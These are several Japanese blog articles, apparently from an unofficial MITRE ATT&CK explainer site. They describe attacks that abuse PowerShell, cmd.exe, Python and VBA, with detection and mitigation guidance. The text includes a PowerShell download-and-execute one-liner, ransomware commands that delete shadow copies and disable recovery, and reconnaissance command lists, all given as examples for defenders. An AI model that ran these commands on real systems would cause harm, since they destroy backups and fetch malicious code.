PowerShellはWindows環境のシステム管理に欠かせないツールですが、サイバー攻撃でも最も悪用されるスクリプト環境の一つです。MITRE ATT&CKではT1059.001 PowerShellとして分類されており、APT29やAPT32など多数の攻撃グループによる利用が確認されています。本記事では、PowerShellがなぜ攻撃に悪用されるのか、実際の攻撃事例、検出方法、そして実務で使える緩和策を日本語で詳しく解説します。

※本サイトはMITRE ATT&CK®の非公式日本語解説サイトです。Based on MITRE ATT&CK® v16。

T1059.001 PowerShellの概要

T1059.001は、T1059 Command and Scripting InterpreterのSub-techniqueであり、Execution（実行 / TA0002）タクティクスに属します。攻撃者はPowerShellを使用して、コマンドの実行、スクリプトのダウンロード、メモリ上でのペイロード実行、横展開（Lateral Movement）など多岐にわたる攻撃活動を行います。

PowerShellが攻撃に悪用される理由

• OS標準搭載: Windows 7以降のすべてのWindowsに標準でインストールされており、追加のツールなしで利用可能
• .NETフレームワークとの統合: .NETのクラスライブラリに直接アクセスでき、ファイルレスマルウェアの実行が可能
• リモート実行: PowerShell Remoting（WinRM）を使って、ネットワーク内の他のマシンでスクリプトをリモート実行可能
• 難読化の容易さ: Base64エンコード（-EncodedCommand）、文字列連結、変数置換などで検出回避が容易
• メモリ内実行: Invoke-Expression (IEX)やリフレクションを使い、ディスクにファイルを書き込まずにペイロードを実行可能

攻撃シナリオ例

APT29（Cozy Bear）— ファイルレスPowerShell攻撃

ロシアの国家支援型グループAPT29は、フィッシングメールを起点とした攻撃でPowerShellを多用します。典型的な攻撃フローは以下の通りです：

T1566（フィッシング）→ T1204（ユーザー実行）→ T1059.001（PowerShell実行）

• フィッシングメールの添付ファイル（LNKファイルやOffice文書）をユーザーが開く
• バックグラウンドでPowerShellが起動し、-EncodedCommandパラメータでBase64エンコードされたコマンドを実行
• C2サーバーからステージャー（小さなダウンローダー）を取得し、メモリ上で実行
• 追加ツール（Mimikatz等）をメモリにロードし、認証情報を窃取

APT32（OceanLotus）— PowerShell + WMIの組み合わせ

ベトナム系のAPT32は、PowerShellとWMI（Windows Management Instrumentation）を組み合わせた持続的なアクセス確保を行います。PowerShellスクリプトをWMIイベントサブスクリプションに登録し、システム起動時に自動実行させるパーシステンス手法を利用します。

Emotetマルウェア — マクロからPowerShellへの連鎖

Emotetの初期感染チェーンでは、Office文書のVBAマクロがPowerShellコマンドを生成・実行します。powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://...')"のようなワンライナーでペイロードをダウンロードし、メモリ上で実行するパターンが広く観測されています。

検出方法

ScriptBlock Logging（イベントID 4104）

PowerShell v5以降で利用可能なScriptBlock Loggingは、実行されたスクリプトの全文をイベントログに記録する最も重要な検出機能です。難読化されたスクリプトでも、実行時に展開された後のコードが記録されるため、攻撃者のエンコードや難読化を突破できます。

有効化方法（グループポリシー）：

コンピューターの構成 → 管理用テンプレート → Windowsコンポーネント → Windows PowerShell
→ 「PowerShell スクリプト ブロックのログ記録を有効にする」を有効化

プロセス作成の監視（イベントID 4688 / Sysmon Event ID 1）

以下のコマンドラインパラメータの組み合わせは高い確率で不審な実行を示します：

• -EncodedCommand / -enc: Base64エンコードされたコマンドの実行
• -ExecutionPolicy Bypass: 実行ポリシーの無視
• -NoProfile / -NoP: プロファイルのスキップ
• -WindowStyle Hidden / -W Hidden: ウィンドウの非表示
• -NonInteractive / -NonI: 非対話モード
• 親プロセスがwinword.exe、excel.exe、mshta.exeなどの場合は特に注意

Module Logging（イベントID 4103）

PowerShellモジュールの入出力を記録します。特定のモジュール（例：Microsoft.PowerShell.Utility）の利用パターンから不審な活動を検出できます。

緩和策（Mitigations）

実装チェックリスト

• ☐ ScriptBlock Logging（イベントID 4104）を全端末で有効化
• ☐ Module Logging（イベントID 4103）を有効化
• ☐ PowerShell v2を無効化（Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2）
• ☐ 実行ポリシーをAllSignedまたはRemoteSignedに設定
• ☐ Constrained Language Modeを検討（.NETアクセスの制限）
• ☐ AppLockerでPowerShellの実行をホワイトリスト管理
• ☐ AMSI対応のエンドポイント保護ソフトを導入

おすすめセキュリティ対策ツール

PowerShellベースの攻撃を検出・防御するためには、AMSI連携に対応したエンドポイント保護が重要です。

🛡️ まず今日から始めるなら：AMSI対応セキュリティソフトの導入
PowerShellの実行時にスクリプトの内容をリアルタイムでスキャンするAMSI連携は、ファイルレス攻撃への最も効果的な防御層の一つです。

• ESET（イーセット） — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト
• ウイルスバスター — 日本語サポートが充実。国産ソフトで中小企業導入実績多数
• Norton（ノートン） — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ：PowerShell攻撃対策の要点

• ログを有効にする：ScriptBlock Logging（4104）とModule Logging（4103）は必須。PowerShell v2は即座に無効化する
• 実行を制限する：AppLocker/WDAC、実行ポリシー、Constrained Language Modeで不正なPowerShell実行を制限
• AMSIで検出する：AMSI対応のセキュリティソフトにより、難読化されたスクリプトでも実行時に検出可能
• 親プロセスに注目する：Office製品やブラウザからPowerShellが起動するパターンは高い確率で攻撃活動

参考資料：MITRE ATT&CK T1059.001 – PowerShell / 情報セキュリティ10大脅威 2026（IPA） / JPCERT/CC

Based on MITRE ATT&CK®, © The MITRE Corporation. Licensed under Apache License 2.0. 本記事は非公式の日本語解説です。

関連記事

• フィッシング詐欺の見分け方と対策【2026年版】
• セキュリティソフトおすすめ比較2026年版【全機能徹底検証】

The post T1059.001 PowerShellを悪用した攻撃手法と検知方法【MITRE ATT&CK】 appeared first on AI Security Review.

Windowsコマンドシェル（cmd.exe）は、Windows OSの最も基本的なコマンドラインインターフェースです。長い歴史を持つこのツールは、攻撃者にも古くから悪用されてきました。MITRE ATT&CKではT1059.003 Windows Command Shellとして分類されており、バッチファイルやコマンドラインによる偵察・実行手法が体系化されています。本記事では、cmd.exeが攻撃でどのように利用されるか、検出方法、緩和策を日本語で解説します。

※本サイトはMITRE ATT&CK®の非公式日本語解説サイトです。Based on MITRE ATT&CK® v16。

T1059.003 Windows Command Shellの概要

T1059.003は、T1059 Command and Scripting InterpreterのSub-techniqueで、Execution（実行 / TA0002）タクティクスに分類されます。攻撃者はcmd.exeを使用して、システム情報の収集（偵察）、ファイル操作、ネットワーク設定の変更、他のマルウェアの実行など、多様な攻撃活動を行います。

cmd.exeが攻撃で利用される理由

• 全Windowsに標準搭載: Windows 95以来すべてのWindows OSに搭載され、確実に利用可能
• 低い検出率: cmd.exeの実行自体は正常な管理操作と区別が困難
• バッチファイル: .bat/.cmdファイルで複数コマンドを自動実行でき、攻撃スクリプトの配布が容易
• パイプとリダイレクト: コマンドの出力をファイルに保存したり、他のコマンドに渡すことで複雑な処理が可能
• 他のツールとの連携: PowerShellやwscript.exeなど他のインタプリタの起動元として使用される

攻撃シナリオ例

偵察フェーズでのcmd.exe利用

攻撃者は初期アクセス後、以下のようなコマンドでシステム・ネットワーク情報を収集します：

whoami /all
systeminfo
ipconfig /all
net user /domain
net group "Domain Admins" /domain
tasklist
netstat -ano
dir C:\Users\ /s /b

これらのコマンドは個々には正常な管理操作ですが、短時間に連続して実行される場合は不審な偵察活動の兆候です。

FIN7 — バッチファイルによる自動化攻撃

金融犯罪グループFIN7は、フィッシングメールの添付ファイルを起点に、cmd.exeでバッチファイルを実行する手法を多用します。VBAマクロからcmd.exe /cでバッチファイルを起動し、認証情報の窃取やバックドアのインストールを自動化します。

QakBot — cmd.exeを経由した多段実行

バンキングトロイのQakBotは、感染後にcmd.exeを使って複数の偵察コマンドを実行し、その結果をC2サーバーに送信します。cmd.exe /c "whoami & ipconfig /all & net view"のように&演算子で複数コマンドを一行に連結して実行する特徴があります。

ランサムウェアでのcmd.exe利用

多くのランサムウェアファミリー（Ryuk、Conti等）は、展開フェーズでcmd.exeを使用してシャドウコピーの削除やサービスの停止を行います：

cmd.exe /c vssadmin delete shadows /all /quiet
cmd.exe /c wmic shadowcopy delete
cmd.exe /c bcdedit /set {default} recoveryenabled No

検出方法

プロセス作成の監視

cmd.exeの実行を検出する際のポイントは、親プロセスとコマンドライン引数の組み合わせです。

• Windowsイベントログ 4688: プロセス作成イベント。コマンドライン引数の監査を有効化していれば実行内容を確認可能
• Sysmon Event ID 1: より詳細なプロセス作成情報（親プロセス、コマンドライン、ハッシュ）

高リスクな実行パターン

• 親プロセスがOfficeアプリ: winword.exe → cmd.exe は正常な業務ではほぼ発生しない高リスクパターン
• /cパラメータ: cmd.exe /cはコマンド実行後に終了するため、スクリプトからの呼び出しに多用される
• エンコードされた引数: cmd.exe /c echoとパイプを組み合わせた難読化パターン
• 偵察コマンドの連続実行: whoami、systeminfo、ipconfig、net等が短時間に連続実行される場合
• vssadmin / bcdedit: シャドウコピー削除やブートレコード変更はランサムウェアの兆候

コマンドライン引数のログ有効化

デフォルトではWindows 4688イベントにコマンドライン引数が含まれません。以下のグループポリシーで有効化します：

コンピューターの構成 → 管理用テンプレート → システム → プロセス作成の監査
→ 「プロセス作成イベントにコマンド ラインを含める」を有効化

緩和策（Mitigations）

実装チェックリスト

• ☐ プロセス作成の監査ポリシーでコマンドライン引数の記録を有効化
• ☐ Sysmonを導入し、Event ID 1でプロセス作成を詳細監視
• ☐ AppLockerでcmd.exeの実行を許可されたユーザー・パスに制限
• ☐ SIEMに偵察コマンドの連続実行を検出するルールを作成
• ☐ Office製品からcmd.exeが起動するパターンのアラートを設定
• ☐ vssadmin/bcdeditの不審な使用を監視するルールを追加
• ☐ エンドポイント保護ソフトでバッチファイルの実行時スキャンを有効化

おすすめセキュリティ対策ツール

コマンドシェルベースの攻撃からシステムを保護するためのツールを紹介します。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
cmd.exeを悪用した不審なコマンド実行パターンを検出・ブロックするためには、振る舞い検知に対応したセキュリティソフトの導入が効果的です。

• ESET（イーセット） — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト
• ウイルスバスター — 日本語サポートが充実。国産ソフトで中小企業導入実績多数
• Norton（ノートン） — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ：Windows Command Shell対策の要点

• cmd.exeは攻撃の基本ツール：偵察からランサムウェア展開まで、攻撃の全段階でcmd.exeは利用される。古典的だが現在も最も多用されるインタプリタの一つ
• 親プロセスとコマンドライン引数が検出の鍵：Office製品やブラウザからの起動、/cパラメータ、偵察コマンドの連続実行を重点的に監視
• AppLockerと監査ポリシーを組み合わせる：実行制限と詳細なログ記録の両輪で、不正利用の防止と検出を同時に実現

参考資料：MITRE ATT&CK T1059.003 – Windows Command Shell / 情報セキュリティ10大脅威 2026（IPA） / JPCERT/CC

Based on MITRE ATT&CK®, © The MITRE Corporation. Licensed under Apache License 2.0. 本記事は非公式の日本語解説です。

関連記事

• フィッシング詐欺の見分け方と対策【2026年版】
• セキュリティソフトおすすめ比較2026年版【全機能徹底検証】

The post T1059.003 Windowsコマンドシェル（cmd.exe）を悪用した攻撃手法と検知方法【MITRE ATT&CK】 appeared first on AI Security Review.

サイバー攻撃の多くは、OSに標準搭載されたスクリプト環境やコマンドラインを悪用して実行されます。MITRE ATT&CKフレームワークでは、こうした手法をT1059 Command and Scripting Interpreter（コマンド＆スクリプティングインタプリタ）として体系的に分類しています。本記事では、T1059の概要から具体的な攻撃シナリオ、検出方法、緩和策までを日本語で詳しく解説します。SOCアナリスト、セキュリティエンジニア、IT管理者の方を対象に、実務で活用できる情報をお届けします。

※本サイトはMITRE ATT&CK®の非公式日本語解説サイトです。Based on MITRE ATT&CK® v16。

T1059 コマンド＆スクリプティングインタプリタの概要

T1059は、MITRE ATT&CKのExecution（実行 / TA0002）タクティクスに分類されるテクニックです。攻撃者は、ターゲットシステム上のコマンドラインインターフェースやスクリプトエンジンを悪用して、不正なコマンドやスクリプトを実行します。

このテクニックが特に危険な理由は、攻撃者が利用するツールがOSの正規機能であるという点です。PowerShell、cmd.exe、Bash、Pythonなどはシステム管理やアプリケーション実行に日常的に使われるため、悪用されてもセキュリティ製品による検出が困難になりがちです。これは「Living off the Land（環境寄生型攻撃）」と呼ばれる手法の中核を成しています。

攻撃チェーンにおけるT1059の位置づけ

典型的な攻撃チェーンでは、T1059は以下のような流れで使用されます：

T1566（フィッシング）→ T1204（ユーザー実行）→ T1059（コマンド＆スクリプティングインタプリタ）

攻撃者はフィッシングメールで悪意のある添付ファイルやリンクを送信し、ユーザーがそれを開くと、バックグラウンドでPowerShellやcmd.exeなどのスクリプトインタプリタが起動され、マルウェアのダウンロードや横展開（Lateral Movement）が実行されます。

T1059のSub-technique一覧

T1059には以下の8つのSub-techniqueが定義されています。各手法には固有の攻撃パターンと検出方法があります。

攻撃シナリオ例

実際の攻撃グループがT1059をどのように使用しているかを紹介します。

APT29（Cozy Bear）によるPowerShell悪用

ロシアの国家支援型攻撃グループAPT29は、フィッシングメールを起点に、PowerShellスクリプトを用いてC2（Command and Control）サーバーとの通信を確立します。エンコードされたPowerShellコマンド（-EncodedCommand）を使用し、セキュリティ製品の検出を回避するのが特徴です。

FIN7によるVBAマクロ攻撃

金融犯罪グループFIN7は、Word/Excel文書に悪意のあるVBAマクロを埋め込み、ユーザーがマクロを有効化すると、cmd.exeやPowerShellを経由してペイロードをダウンロード・実行します。請求書や発注書を装った文書で受信者の信頼を得る手口が典型的です。

Lazarus GroupによるPython利用

北朝鮮系のLazarus Groupは、Pythonスクリプトを使用して暗号資産取引所への攻撃を実行した事例があります。Pythonのクロスプラットフォーム性を利用し、Windows・Linux両環境で動作するバックドアを展開しました。

検出方法

T1059に関連する不審な活動を検出するための主要なアプローチを紹介します。

プロセス監視

スクリプトインタプリタの実行を監視することが最も基本的な検出手法です。

• PowerShell: powershell.exe / pwsh.exe の起動。特に -EncodedCommand、-ExecutionPolicy Bypass、-NoProfile パラメータの使用
• cmd.exe: 親プロセスがOfficeアプリケーション（winword.exe、excel.exe）の場合は高リスク
• Python/JavaScript: python.exe、wscript.exe、cscript.exe の不審な起動パターン

コマンドラインログ

Windowsイベントログの以下のIDを監視します：

• イベントID 4688: プロセス作成（コマンドライン引数を含む）
• イベントID 4104: PowerShell ScriptBlock Logging（実行されたスクリプトの全文を記録）
• イベントID 4103: PowerShell Module Logging
• Sysmon Event ID 1: 詳細なプロセス作成情報

ネットワーク監視

スクリプトインタプリタからの外部通信を検出します。PowerShellのInvoke-WebRequestやPythonのurllibによる不審な外部接続、難読化されたBase64ペイロードのダウンロードなどがアラート対象になります。

緩和策（Mitigations）

実装チェックリスト

• ☐ PowerShell ScriptBlock Logging（イベントID 4104）を有効化
• ☐ コマンドラインプロセス監査（イベントID 4688）を有効化
• ☐ AppLockerまたはWDACでスクリプト実行ポリシーを設定
• ☐ Office文書のVBAマクロをデフォルト無効に設定
• ☐ 不要なスクリプトエンジン（wscript.exe、cscript.exe等）の実行を制限
• ☐ エンドポイント保護ソフトのAMSI連携を確認

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
スクリプトベースの攻撃を検出・ブロックするためには、AMSI連携に対応した信頼性の高いセキュリティソフトの導入を強くお勧めします。

• ESET（イーセット） — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト
• ウイルスバスター — 日本語サポートが充実。国産ソフトで中小企業導入実績多数
• Norton（ノートン） — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ：T1059対策の3つのポイント

• 正規ツールの悪用に注意：PowerShell、cmd.exe、Python等のOS標準ツールが攻撃の入口になる。「Living off the Land」攻撃は従来のシグネチャ検出では見逃されやすい
• ログの充実が検出の鍵：ScriptBlock Logging、コマンドラインプロセス監査、Sysmonを有効化し、SIEM/EDRで相関分析を行うことで不審なスクリプト実行を早期に検出できる
• 多層防御で緩和する：AppLocker/WDAC、マクロ無効化、コード署名ポリシー、AMSI連携を組み合わせてスクリプト実行リスクを最小化する

参考資料：MITRE ATT&CK T1059 – Command and Scripting Interpreter / 情報セキュリティ10大脅威 2026（IPA） / JPCERT/CC

Based on MITRE ATT&CK®, © The MITRE Corporation. Licensed under Apache License 2.0. 本記事は非公式の日本語解説です。

関連記事

• フィッシング詐欺の見分け方と対策【2026年版】
• セキュリティソフトおすすめ比較2026年版【全機能徹底検証】

The post T1059 コマンド＆スクリプティングインタプリタとは？攻撃手法と検知方法【MITRE ATT&CK】 appeared first on AI Security Review.

Pythonは機械学習・自動化・Web開発など幅広い用途で利用される汎用プログラミング言語ですが、サイバー攻撃においても強力なツールとして悪用されています。MITRE ATT&CKではT1059.006 Pythonとして分類されており、APT41やTurla、Kimsukyなど複数の国家支援型攻撃グループによる利用が確認されています。本記事では、Pythonがなぜ攻撃に悪用されるのか、実際の攻撃事例、検出方法、そして実務で使える緩和策を日本語で詳しく解説します。

※本サイトはMITRE ATT&CK®の非公式日本語解説サイトです。Based on MITRE ATT&CK® v16。

T1059.006 Pythonの概要

T1059.006は、T1059 Command and Scripting InterpreterのSub-techniqueであり、Execution（実行 / TA0002）タクティクスに属します。攻撃者はPythonを使用して、攻撃の自動化、リバースシェルの構築、データの窃取、ポストエクスプロイト（侵入後の活動）など多岐にわたる攻撃活動を行います。PythonはOS標準搭載のケースも多く（macOS、多くのLinuxディストリビューション）、攻撃者にとって非常に利便性の高いスクリプト環境です。

Pythonが攻撃に悪用される理由

• クロスプラットフォーム: Windows、macOS、Linuxのすべてで動作し、一つのスクリプトで複数のOSを攻撃可能
• 豊富なライブラリ: socket、subprocess、os、ctypes、requestsなど、ネットワーク通信・プロセス操作・システム制御に使えるモジュールが標準で利用可能
• OS標準搭載: macOSやほとんどのLinuxディストリビューションにプリインストールされており、追加インストール不要で攻撃を開始できる
• ポストエクスプロイトフレームワーク: Impacket、Cobalt Strike用ローダー、Mythic C2エージェントなど、Pythonベースの攻撃ツールが豊富に存在
• 難読化・パッキング: PyInstaller、py2exe、Nuitkaなどでスタンドアロン実行ファイルに変換でき、Python未インストール環境でも実行可能かつ解析が困難
• PyPIサプライチェーン攻撃: 正規のパッケージに偽装した悪意あるパッケージをPyPI（Python Package Index）に公開し、開発者を騙してインストールさせる攻撃が増加

攻撃シナリオ例

APT41（Double Dragon）— Pythonベースのポストエクスプロイト

中国の国家支援型グループAPT41は、サイバースパイ活動と金銭目的の攻撃を両方行うことで知られ、Pythonベースのツールを積極的に活用しています。典型的な攻撃フローは以下の通りです：

T1190（公開サービスの悪用）→ T1059.006（Python実行）→ T1005（ローカルデータ収集）

• Webアプリケーションの脆弱性（SQLインジェクション等）を突いて初期アクセスを獲得
• 侵入先のサーバーにプリインストールされたPythonを利用して偵察スクリプトを実行
• Pythonで書かれたカスタムバックドアを配置し、C2（Command and Control）サーバーと通信を確立
• Impacketライブラリを使用してActive Directory環境内での横展開（Lateral Movement）を実行
• Pythonスクリプトでデータを暗号化し、HTTPSトンネル経由でデータを外部に持ち出す

Turla（Snake）— Pythonバックドアによる長期潜伏

ロシアのFSBに関連するとされるTurlaグループは、Pythonで記述されたバックドアを使用した長期的なスパイ活動で知られています。Turlaの特徴的な手法として、侵害したWebサーバー上にPythonのTiny Shellバックドアを配置し、正規のWebトラフィックに偽装してC2通信を行います。また、Carbon（別名：Snake）フレームワークの一部コンポーネントにPythonが使用されており、モジュール式のプラグインアーキテクチャにより柔軟な攻撃活動を実現しています。

PyPIサプライチェーン攻撃 — 悪意あるパッケージの大量配布

2022年以降、PyPI（Python Package Index）を悪用したサプライチェーン攻撃が急増しています。攻撃者は正規パッケージに酷似した名前（タイポスクワッティング）で悪意あるパッケージを公開し、開発者がpip installで誤ってインストールすることを狙います。これらの悪意あるパッケージは、setup.pyの実行時にリバースシェルを起動したり、環境変数やSSHキーなどの認証情報を窃取してC2サーバーに送信します。2023年には数千個の悪意あるパッケージがPyPIで発見・削除されており、開発環境のセキュリティが重要な課題となっています。

検出方法

Pythonプロセスの実行監視

Pythonの不審な実行を検出するために、プロセスの起動イベント（Sysmon Event ID 1、Windowsイベント ID 4688、Linux auditd）を監視します。以下のパターンは攻撃の兆候として特に注意が必要です：

• python.exe/python3が想定外のディレクトリから実行される（例：C:\Users\Public、/tmp、/dev/shm）
• python -c "..."によるワンライナー実行: コマンドラインで直接Pythonコードを実行するパターン
• 親プロセスが異常: Webサーバー（apache、nginx、IIS）やOfficeアプリケーションからPythonが起動する場合
• pythonがBase64デコードやexec()/eval()を含むコマンドラインで起動される
• PyInstallerの一時ディレクトリ（_MEIで始まるフォルダ）からの実行ファイル起動

ネットワーク接続の監視

Pythonプロセスからの不審なネットワーク通信を検出することで、リバースシェルやC2通信を早期に発見できます。Sysmon Event ID 3（ネットワーク接続）やEDRのネットワークテレメトリを活用します。

• python/python3プロセスからの外部IPへのアウトバウンド接続（特にポート443、8443、4444、8080など）
• socketモジュールによるRAWソケット通信: 通常のHTTP/HTTPSではない低レベルの通信
• DNS over HTTPSやDNSトンネリング: requestsライブラリを使ったC2通信の隠蔽
• Pythonプロセスからの大量データ送信: データ窃取（Exfiltration）の兆候

ファイルシステムとパッケージ管理の監視

Pythonスクリプトの配置やパッケージのインストールを監視することで、攻撃の準備段階を検出できます。

• pip installの実行ログ: 本番環境での想定外のパッケージインストールは攻撃者がツールを導入している可能性
• .py/.pycファイルの新規作成: /tmp、一時ディレクトリ、Webルート配下への不審なスクリプト配置
• PyInstallerによるパッキング痕跡: _internalディレクトリや_MEI*一時フォルダの存在
• 仮想環境の不審な作成: venv/virtualenvが通常使用しない場所に作成される

緩和策（Mitigations）

実装チェックリスト

• ☐ 業務上Python不要な端末・サーバーからPythonをアンインストール
• ☐ AppLocker/WDAC（Windows）またはSELinux/AppArmor（Linux）でPython実行を制限
• ☐ Sysmon/auditdでPythonプロセスの起動イベントを監視
• ☐ EDRでPythonプロセスからの不審なネットワーク接続をアラート設定
• ☐ pip installの実行を本番環境で制限・監視する運用ルールを策定
• ☐ PyPIからのパッケージインストール時に依存関係の検証を実施（pip-audit等）
• ☐ エンドポイント保護ソフトを導入し、Pythonスクリプトのリアルタイム検出を有効化
• ☐ ネットワークセグメンテーションでPythonが動作するサーバーの通信を制限

おすすめセキュリティ対策ツール

Pythonベースの攻撃を検出・防御するためには、プロセス監視とネットワーク監視に対応したエンドポイント保護が重要です。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
Pythonスクリプトによるリバースシェルやデータ窃取は、エンドポイント保護ソフトのリアルタイムスキャンと振る舞い検知で検出可能です。特にPyInstallerでパッキングされた実行ファイルの解析に対応した製品が有効です。

• ESET（イーセット） — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト
• ウイルスバスター — 日本語サポートが充実。国産ソフトで中小企業導入実績多数
• Norton（ノートン） — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ：Python攻撃対策の要点

• 不要な環境からPythonを削除する：業務でPythonを使用しない端末やサーバーからはアンインストールし、攻撃対象領域を縮小する
• プロセス実行を監視する：python.exe/python3の起動元、コマンドライン引数、親プロセスを監視し、不審な実行パターンを検出する
• ネットワーク通信を制御する：Pythonプロセスからの外部通信をファイアウォールとEDRで監視・制限し、リバースシェルやC2通信を遮断する
• サプライチェーンに注意する：PyPIからのパッケージインストールはpip-audit等で検証し、本番環境でのpip installは厳格に管理する

参考資料：MITRE ATT&CK T1059.006 – Python / 情報セキュリティ10大脅威 2026（IPA） / JPCERT/CC

Based on MITRE ATT&CK®, © The MITRE Corporation. Licensed under Apache License 2.0. 本記事は非公式の日本語解説です。

関連記事

• T1059 コマンド＆スクリプティングインタプリタとは？攻撃手法と検知方法
• T1059.001 PowerShellを悪用した攻撃手法と検知方法
• T1059.004 Unix Shell（bash/sh）を悪用した攻撃手法と検知方法
• セキュリティソフトおすすめ比較2026年版【全機能徹底検証】

The post T1059.006 Pythonを悪用した攻撃手法と検知方法【MITRE ATT&CK】 appeared first on AI Security Review.

Visual Basic（VBA/VBScript）は、Officeマクロやシステム管理スクリプトとして広く使われてきた技術ですが、サイバー攻撃の初期侵入手段としても長年悪用され続けています。MITRE ATT&CKではT1059.005 Visual Basicとして分類されており、APT28（Fancy Bear）やGamaredon、Emotetなど多数の攻撃グループ・マルウェアによる利用が確認されています。本記事では、Visual Basicが攻撃に悪用される理由、実際の攻撃事例、検出方法、そして実務で使える緩和策を日本語で詳しく解説します。

※本サイトはMITRE ATT&CK®の非公式日本語解説サイトです。Based on MITRE ATT&CK® v16。

T1059.005 Visual Basicの概要

T1059.005は、T1059 Command and Scripting InterpreterのSub-techniqueであり、Execution（実行 / TA0002）タクティクスに属します。攻撃者はVisual Basic for Applications（VBA）マクロ、VBScript、HTML Application（HTA）などを使用して、悪意あるコードの実行、ファイルのダウンロード、追加マルウェアの展開、システム情報の収集など多岐にわたる攻撃活動を行います。

Visual Basicの攻撃は主に3つの形態に分類されます：

• VBA（Visual Basic for Applications）マクロ：Word、Excel等のOffice文書に埋め込まれたマクロコード
• VBScript：wscript.exe / cscript.exe で実行されるスクリプトファイル（.vbs、.vbe）
• HTA（HTML Application）：mshta.exe で実行される、VBScriptを含むHTMLアプリケーション（.hta）

Visual Basicが攻撃に悪用される理由

• Office文書への埋め込み：ビジネスメールに添付されるWord・Excelファイルに自然に仕込むことができ、フィッシングの成功率が高い
• OS標準のスクリプトエンジン：VBScriptはWindowsに標準搭載されたwscript.exe / cscript.exeで実行でき、追加ツールが不要
• WMI・COMオブジェクトへのアクセス：VBAやVBScriptからWMIやCOMオブジェクトに直接アクセスでき、システムの深部を操作可能
• 難読化の容易さ：文字列連結、Chr()関数、変数置換などで検出回避が比較的容易
• 他の攻撃手法との連鎖：マクロからPowerShellやcmd.exeを起動する「ドロッパー」として機能し、多段攻撃の起点となる
• ユーザーの信頼：「コンテンツの有効化」をクリックさせるソーシャルエンジニアリングが長年にわたり有効

攻撃シナリオ例

APT28（Fancy Bear）— VBAマクロによるスピアフィッシング

ロシアの軍事情報機関GRUに関連するAPT28は、標的型フィッシングメールにVBAマクロ入りのOffice文書を添付する手法を多用します。典型的な攻撃フローは以下の通りです：

T1566（フィッシング）→ T1204.002（悪意あるファイルの実行） → T1059.005（VBAマクロ実行）→ T1059.001（PowerShell実行）

• 政府機関・防衛関連組織の職員に対し、業務関連を装ったWord文書を送付
• ユーザーが「コンテンツの有効化」をクリックすると、AutoOpen/Document_Openマクロが起動
• VBAマクロがPowerShellコマンドを生成し、バックグラウンドで実行
• C2サーバーからSednitやZebrocyなどのマルウェアをダウンロード・実行

Gamaredon — VBAマクロの大量展開による持続的攻撃

ウクライナを主な標的とするロシア系グループGamaredon（Primitive Bear）は、VBAマクロを攻撃の中核技術として極めて頻繁に使用します。

• 感染した文書が開かれると、VBAマクロがNormal.dotm（グローバルテンプレート）を改変し、以後作成・編集する全Word文書にマクロを自動注入
• VBScriptファイル（.vbs）をスタートアップフォルダやスケジュールタスクに配置して永続化を確保
• VBScriptでC2通信を行い、新しいペイロードのダウンロードや窃取データのアップロードを実行
• 難読化にはChr()関数と文字列連結を多用し、シグネチャベースの検知を回避

Emotet — マクロベースの大規模初期感染チェーン

Emotetは世界最大級のマルウェア配布基盤として知られ、VBAマクロを初期感染の主要経路として活用してきました。

• 大量のスパムメールにVBAマクロ入りのWord/Excel文書を添付して配布
• 「請求書」「配送通知」「給与明細」など業務文書を装い、マクロの有効化を誘導
• VBAマクロがPowerShellまたはcmd.exeを起動し、複数のC2サーバーURLに対してペイロードのダウンロードを試行
• ダウンロードされたEmotet本体がさらにTrickBot、QakBot、Ryukランサムウェアなどの追加マルウェアを展開

検出方法

Officeアプリケーションからのプロセス生成監視

VBAマクロ攻撃の最も確実な検出ポイントは、Officeプロセスからの不審な子プロセスの生成です。以下のパターンはほぼ確実に攻撃活動を示します：

• winword.exe / excel.exe → powershell.exe：マクロからPowerShellを起動するEmotet等の典型パターン
• winword.exe / excel.exe → cmd.exe：コマンドシェル経由でのペイロード実行
• winword.exe / excel.exe → mshta.exe：HTA経由でのスクリプト実行
• winword.exe / excel.exe → wscript.exe / cscript.exe：VBScriptの外部実行
• winword.exe / excel.exe → certutil.exe / bitsadmin.exe：ファイルダウンロード

Sysmon Event ID 1（プロセス作成）やWindowsイベントID 4688で、ParentImageフィールドがOfficeアプリケーションのプロセスを指しているかを監視します。

AMSI（Antimalware Scan Interface）によるVBAスキャン

Office 365およびOffice 2019以降では、AMSIがVBAマクロの実行時にスクリプトの内容をリアルタイムでスキャンします。これにより、ファイル上では難読化されていたコードも、実行時に展開された状態で検査されます。

• AMSIはVBAマクロの実行前に難読化を解除した状態のコードをセキュリティソフトに渡す
• AMSI対応のエンドポイント保護ソフトがスキャン結果に基づいてブロック判定を行う
• Chr()関数や文字列連結による難読化を突破して検出可能

VBScript実行ログの監視

wscript.exe / cscript.exe によるVBScript実行を監視することで、マクロ外のVBScript攻撃も検出できます。

• Sysmon Event ID 1：wscript.exe / cscript.exe のプロセス作成を記録し、コマンドラインから実行されたスクリプトのパスを確認
• 不審な実行パス：%TEMP%、%APPDATA%、ダウンロードフォルダからの.vbs/.vbe実行は要注意
• Windowsイベントログ：Microsoft-Windows-Sysmon/Operationalログに加え、Microsoft-Windows-WMI-Activity/Operationalログでスクリプト実行を追跡
• mshta.exe の監視：HTAファイル（.hta）の実行はほぼ全てが不審。mshta.exe のプロセス作成自体をアラート対象にすることを推奨

緩和策（Mitigations）

実装チェックリスト

